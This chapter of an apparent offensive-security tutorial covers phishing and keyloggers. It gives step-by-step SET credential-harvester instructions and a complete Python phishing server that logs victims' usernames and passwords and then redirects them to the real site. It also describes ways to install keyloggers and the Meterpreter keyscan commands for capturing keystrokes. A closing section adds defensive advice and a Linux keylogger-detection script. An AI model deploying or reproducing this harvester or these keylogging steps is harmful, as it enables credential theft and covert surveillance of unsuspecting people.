Chapter 3) Text Manipulation
Phishing is a social engineering attack used by both scammers and hackers. By pretending to be an authentic and trusted authority, the attacker manipulates the victim into giving out personal information: the hacker may pose as a representative of an IT company or a bank, an employee of an online payment service, or even a friend from a social media site. The attack typically pulls the user to a website that is a clone of one the user knows and visits frequently, so that nothing about it looks unfamiliar.
Phishing is usually carried out by cloning a legitimate website in the hope of capturing the user's login details. The clone is made to look exactly like the original, and a small piece of server-side code collects the username and password submitted to its login form. That information is saved somewhere the attacker can retrieve it, usually as plain text. The clone then sends the victim on to the real site, either by replaying the captured credentials in a login attempt against the original or simply by redirecting the browser to the genuine login page. This is the most important step in the procedure: the victim must see the site he or she expected and have no reason to suspect foul play during the login attempt.
The user is lured to the cloned website by a phishing email that prompts him or her to click a link leading to the clone. The Social Engineering Toolkit (SET) in Kali Linux is the standard tool for both halves of this: it can clone a website so that it looks exactly like the original, and it includes a mass mailer that sends the phishing email to a single target address or to a list of them.
To run the attack, log into your Kali Linux system and start the Social Engineering Toolkit, either from the applications menu (it is listed under Social Engineering Tools or Exploitation Tools, depending on the Kali release; the older BackTrack menus placed it under BackTrack > Exploitation Tools) or simply by running setoolkit in a terminal. SET opens in the terminal with a numbered menu of social engineering attack types. Choose Social-Engineering Attacks, then Website Attack Vectors, then option 3, the Credential Harvester Attack Method. This is the option that lets us clone a website and capture what is typed into it.
The credential harvester method offers three sub-options: (1) Web Templates, which imports a set of pre-built login pages shipped with SET; (2) Site Cloner, which copies any site we name; and (3) Custom Import, which loads our own HTML. With Site Cloner, SET asks for the IP address on which the harvester should listen and for the URL of the site to clone. The listening address is the one the victim's browser will post the form back to, so it must be reachable from the victim's network (a public address or a forwarded port, not a private lab address). Once both values are provided, SET fetches the page, rewrites its login form so that it posts to the harvester, and starts a web server. When an unsuspecting victim submits the form, SET records the username and password and redirects the browser to the real site. The clone is normally paired with SET's mass mailer or spear-phishing options, which send the link to the cloned site to one target or to many.
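The harvester that Site Cloner sets up is nothing more than a small web server, and the credential-collecting step described earlier and the SET procedure above are the same mechanism. The Python below is an added illustration written for this chapter, not SET's own code: it serves a placeholder login form in place of a real clone, writes every submitted field to a text file as one JSON line, and answers the POST with a redirect to the genuine site, which is the step that keeps the victim from noticing anything. The listen address and port, the impersonated site's URL and the log-file name are assumptions.

```python
"""Credential-harvester mechanics: serve a login form, log what is posted,
then bounce the victim to the real site. Added illustration, not SET code."""
import datetime
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

REAL_SITE = "https://login.example.com/"   # assumption: the site being impersonated
LOG_FILE = "harvester.txt"                 # assumption: plain-text log, as SET writes
LISTEN = ("0.0.0.0", 8080)                 # assumption: SET itself defaults to port 80

# Stand-in for a cloned page; a real clone is the target's saved HTML with the
# form's action rewritten to point at this server.
CLONED_FORM = b"""<html><body><form method="POST" action="/">
Username <input name="username"><br>
Password <input name="password" type="password"><br>
<input type="submit" value="Log in"></form></body></html>"""


def harvest(body, client_ip, now_iso=None):
    """Turn a raw form POST body into a log record.

    keep_blank_values=True so an empty password field is still recorded
    rather than silently dropped by parse_qs.
    """
    fields = {k: v[0] for k, v in
              parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True).items()}
    return {
        "time": now_iso or datetime.datetime.now(datetime.timezone.utc).isoformat(),
        "client": client_ip,
        "fields": fields,
    }


def record_to_line(record):
    """One JSON object per line; sort_keys keeps the file greppable and diffable."""
    return json.dumps(record, sort_keys=True)


class Harvester(BaseHTTPRequestHandler):
    def do_GET(self):
        # Any path serves the clone; real kits also serve the copied CSS and images.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(CLONED_FORM)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        record = harvest(self.rfile.read(length), self.client_address[0])
        with open(LOG_FILE, "a") as log:
            log.write(record_to_line(record) + "\n")
        # The essential step: send the victim to the genuine site so a
        # failed-looking login is blamed on a typo, not on a clone.
        self.send_response(302)
        self.send_header("Location", REAL_SITE)
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(LISTEN, Harvester).serve_forever()
```

Run it on the address you would have typed into SET's listener prompt and watch harvester.txt fill up; the redirect target has to be the page the victim expected, or the illusion breaks at the very moment the credentials are captured.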
Keyloggers are programs or devices that let the hacker record every keystroke the victim types and save it in a readable text format. They are a very useful tool for information gathering. Most keyloggers are software that runs in the background on the computer it was installed on, but hardware keyloggers also exist: small USB or PS/2 pass-through adapters plugged in between the keyboard and the computer. Such a device contains a memory chip that stores everything typed and can later be removed and read out. There are also wireless keyloggers that sniff and intercept the traffic between a wireless keyboard and its receiver. Software keyloggers, once installed on the target computer, run in the background without interfering with the victim's normal use of the machine.
A software keylogger must first be installed on the victim's computer, and this can be done in several ways. A hacker who knows of a flaw in an application the victim uses can exploit it to make the victim's browser fetch and run the keylogger from a website. The hacker may instead send the victim a link to download an application or file that carries the keylogger; when the victim installs the application, the keylogger is installed silently alongside it and started in the background. Another option is to leave a USB drive with an autorun file containing the keylogger where someone will find it; a curious finder who plugs it in to see what is on it runs the keylogger without knowing. Note that Windows has not honoured autorun.inf on removable drives since Windows 7 (and the patched versions of XP and Vista), so a modern USB drop relies on the finder opening a file on the drive, or on a device that presents itself to the computer as a keyboard and types the commands itself.
Many keyloggers report remotely and need an internet connection to send the captured keystrokes to the hacker. Others save the keystrokes locally on the victim's computer and require the hacker to have physical access to the machine, or a later remote session, to retrieve the log files. Keyloggers can do more than record keystrokes: many also take periodic screenshots and capture whatever is copied to the clipboard.
Keyloggers are powerful yet easy to build, and they are often bundled with a rootkit or other malware that hides them. Spyware of this kind needs little code and few resources to run, so it can fly under the radar of the system's antivirus. On Windows a typical keylogger consists of a dynamic link library that hooks keyboard input plus an installer that drops the files and arranges for them to run in the background. A keylogger can also be run from Metasploit in Kali Linux through a Meterpreter session: keyscan_start begins capturing, keyscan_dump retrieves the keystrokes recorded so far, and keyscan_stop ends the capture. Meterpreter only sees keystrokes delivered to the process it is running in, so the usual practice is to migrate into a process that receives the user's input, such as explorer.exe, before starting the capture.
Protection against keyloggers is recommended for any PC user. A good start is an anti-malware product that specifically looks for spyware, since keyloggers are sneaky and can slip past a plain antivirus; such a product searches out keyloggers running in the background. Some protection tools also encrypt keystrokes at the driver level, so a software keylogger hooking higher up in the system receives only a jumbled log. This does not help against hardware keyloggers, which sit between the keyboard and the computer and see the raw keystrokes before any software runs; the only defence there is to physically inspect the keyboard cable and ports. There is no one-size-fits-all approach, so it is advisable to scan the system regularly, look through the background processes for anything odd, and avoid downloading and installing suspicious applications.
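Looking through the background processes for something odd, as recommended above, can be made concrete on Linux: a software keylogger that reads keystrokes straight from the kernel's input layer must hold /dev/input/event* open, and /proc/<pid>/fd shows which processes do. The Python below is an added example written for this chapter, not a tool from the page or from Kali; it lists those processes and flags any whose name is not in a small allowlist of programs expected to read input devices. The allowlist and the sample /proc tree it builds for an offline run are constructed assumptions; on a real host run it as root, since other users' fd tables are not readable otherwise. It does not see keyloggers that hook at another layer (an X11 XRecord client, or a Windows DLL installed with SetWindowsHookEx), so it is one check among several, not a complete answer.

```python
"""Find processes holding raw input devices open: the footprint of a Linux
keylogger that reads /dev/input/event* directly. Added example, not page code."""
import os
import re
import tempfile

INPUT_DEVICE = re.compile(r"^/dev/input/(event\d+|mice|mouse\d+|js\d+)$")

# Programs that legitimately read input devices on a desktop.
# Assumption: adjust this for the host being checked.
KNOWN_READERS = {"Xorg", "Xwayland", "gnome-shell", "kwin_wayland", "sway",
                 "weston", "systemd-logind", "acpid", "upowerd", "evtest"}


def input_device_readers(proc_root="/proc"):
    """Return {pid: (comm, [devices])} for every process with an input fd open."""
    found = {}
    for entry in os.scandir(proc_root):
        if not entry.name.isdigit():          # skip self, sys, uptime, ...
            continue
        fd_dir = os.path.join(entry.path, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:                       # another user's process, not root: skip
            continue
        devices = set()
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:                   # fd closed between listdir and readlink
                continue
            if INPUT_DEVICE.match(target):
                devices.add(target)
        if devices:
            try:
                with open(os.path.join(entry.path, "comm")) as f:
                    comm = f.read().strip()
            except OSError:
                comm = "?"
            found[int(entry.name)] = (comm, sorted(devices))
    return found


def suspicious_readers(proc_root="/proc", known=KNOWN_READERS):
    """Readers whose process name is not on the allowlist: worth a closer look."""
    return {pid: info for pid, info in input_device_readers(proc_root).items()
            if info[0] not in known}


def build_sample_proc():
    """Constructed /proc look-alike for an offline run (not a real capture):
    systemd with no input fds, Xorg reading two devices, and an oddly named
    'kworkerd' reading event3 alongside a log file in /tmp."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    layout = {
        1: ("systemd", ["/dev/null"]),
        812: ("Xorg", ["/dev/input/event2", "/dev/input/event3"]),
        4242: ("kworkerd", ["/dev/input/event3", "/tmp/.k.log"]),
    }
    for pid, (comm, targets) in layout.items():
        fd_dir = os.path.join(root, str(pid), "fd")
        os.makedirs(fd_dir)
        with open(os.path.join(root, str(pid), "comm"), "w") as f:
            f.write(comm + "\n")
        for i, target in enumerate(targets):
            os.symlink(target, os.path.join(fd_dir, str(i)))   # dangling links are fine
    with open(os.path.join(root, "uptime"), "w") as f:          # non-pid entry to skip
        f.write("0.0 0.0\n")
    return root


if __name__ == "__main__":
    for pid, (comm, devs) in suspicious_readers().items():
        print(f"{pid}\t{comm}\t{' '.join(devs)}")
```

A hit is a lead, not a verdict: confirm with ls -l /proc/<pid>/exe and the process's parent before acting, because an unfamiliar but legitimate input daemon will also show up until it is added to the allowlist.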